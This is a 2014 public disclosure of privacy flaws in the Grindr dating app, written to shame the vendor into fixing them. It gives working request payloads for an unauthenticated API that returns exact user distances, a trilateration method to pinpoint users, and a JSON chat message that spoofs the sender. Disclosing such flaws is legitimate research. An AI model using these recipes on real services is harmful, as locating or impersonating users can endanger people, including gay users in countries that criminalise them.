[Grindr] errors and omissions 2014

1. #
2. # How Grindr[0] fails to protect their user's privacy by not implementing a secure chat.
3. #
4.  
5. Just like 2012[1] and 2013[2], this year's "WTF? Why am I still using Grindr"-moment comes with the fact that
6. it's possible to locate every single user and perform a sender spoof using the chat.
7.  
8. #
9. # 1 Why public?
10. #
11. I know officials at grindr have been informed several times within the past months about these issues, which would seem to imply that the concept of "social responsibility" is lost upon Grindr. While you may live in a country where using Grindr is no big deal, there are countries like Sudan and Yemen where anti-gay laws have been enacted with severe consequences[3], e.g. the death penalty. Knowing that Grindr-Users in countries such as these are being put unnecessarily at a high risk should be reason enough for Grindr to change its system.
12. Even without the such a risk: Would you want it to be possible for someone to show on a map, exactly where you are to the point where they could tell if you were using Grindr in the bathroom or on the couch?
13.  
14. #
15. # 2 locating users
16. # 2a general
17. #
18. Geo-based (dating) apps use the location of every user to show distances to each other. Using the same process as GPS satellites, it is possible for a malicious entity to perform a lateration[4], sending distance-requests from three different points and using the responses to calculate the exact position of a particular user.
19.  
20. #
21. # 2b Grindr
22. #
23. Grindr sends very detailed distance information - and the best: no authentication required!
24. To get a list the nearest 50 users around a location, send a POST-Request to https://primus.grindr.com/2.0/nearbyProfiles containing the following JSON-Object:
25. {
26. "filter":{
27. "page":1,
28. "quantity":50
29. },
30. "lat":$LATITUDE$,
31. "lon":$LONGITUDE$
32. }
33.  
34. You'll receive a response which also contains a JSON-Object:
35. {
36. "profiles": [{
37. "profileId": [REDACTED],
38. "status": 1,
39. "version": 1404857602,
40. "profileImageMediaHash": "[REDACTED]",
41. "age": 30,
42. "showDistance": false, << Good boy!
43. "showAge": true,
44. "seen": 1408203579000,
45. "isFavorite": false
46. }, {
47. "profileId": [REDACTED],
48. "status": 1,
49. "displayName": "thomas",
50. "headline": "give me tonight",
51. "headlineDate": 1404857602000,
52. "version": 1404857602,
53. "profileImageMediaHash": "[REDACTED]",
54. "age": 28,
55. "showDistance": true,
56. "showAge": true,
57. "ethnicity": 7,
58. "lookingFor": [4, 5, 3, 6],
59. "relationshipStatus": 1,
60. "bodyType": 5,
61. "height": 172.0,
62. "weight": 73935.5546875,
63. "seen": 1408203078000,
64. "distance": 0.723241061801939, << Base for locating
65. "isFavorite": false
66. }, {
67. ...
68. }]
69. }
70.  
71. The first user chose not to show the their location, so we're not able to locate him.
72. The second user has his location services on. If we were to perform that same request two more times at different longitudes/latitudes, we would have the necessary data to perform a trilateration, e.g. using a pythonscript[5] from the internet (three known points and distances, one unknown point (user)).
73. Having now calculated the location of every user, it's trivial to show it on a map like this[6].
74.  
75. Note: Disable "show location"-flag to prevent being located in this way.
76.  
77. #
78. # 3 Sender spoof
79. #
80. Grindr's chat runs via XMPP[7], an open standard for chatting. To send messages, you need an account created via the Grindr-App.
81.  
82. To login on grindr's XMPP-Servers, you simply connect to:
83.  
84. server: primus-prod-chat-0001.grindr.com
85. port: 5222
86. host: chat.grindr.com
87.  
88. The user ID and password must be known. (Capture your grindr's app traffic and watch out for the request sent to https://primus.grindr.com/2.0/session, the "xmppToken" within the response contains the password).
89.  
90. So far so good. The messages are not sent directly, but rather as JSON-Objects. It is at this point in which a sender-spoof can take place:
91.  
92. You simply send a message to another grindr user's ID (see profileId from #2b (locating guys on Grindr)) containing the following message:
93. {
94. "body":"TEXT GOES HERE",
95. "messageId":"[REDACTED]", << unique messageID
96. "sourceProfileId":"12345678", << who's texting? here you can enter ANY id and it will be shown as sender
97. "targetProfileId":"910111213", << who's receiving? important to put the grindr user's ID here.
98. "timestamp":[REDACTED],
99. "type":"text"
100. }
101.  
102. Only the intended target will have knowledge of the spoofed message. The "sender" user-ID used for the spoof will not receive a copy.
103.  
104. Note: Grindr really need to get their priorities in order; The tons of ad- and tracking services are very well implemented in their App, however the core of grindr, the chat-protocol is completely insecure.
105.  
106. ##
107. [0] http://grindr.com/
108. [1] https://nakedsecurity.sophos.com/2012/01/20/grindr-hack/
109. [2] https://www.os3.nl/_media/reports/grindr.pdf
110. [3] https://www.bbc.com/news/world-25927595
111. [4] https://en.wikipedia.org/wiki/Trilateration
112. [5] https://gis.stackexchange.com/questions/66/trilateration-using-3-latitude-and-longitude-points-and-3-distances/415#415
113. [6] https://www.anonimg.com/img/a88256042dade7e5f527fad8b5b69524.png
114. [7] https://en.wikipedia.org/wiki/XMPP
115. [8] https://en.wikipedia.org/wiki/Spoofing_attack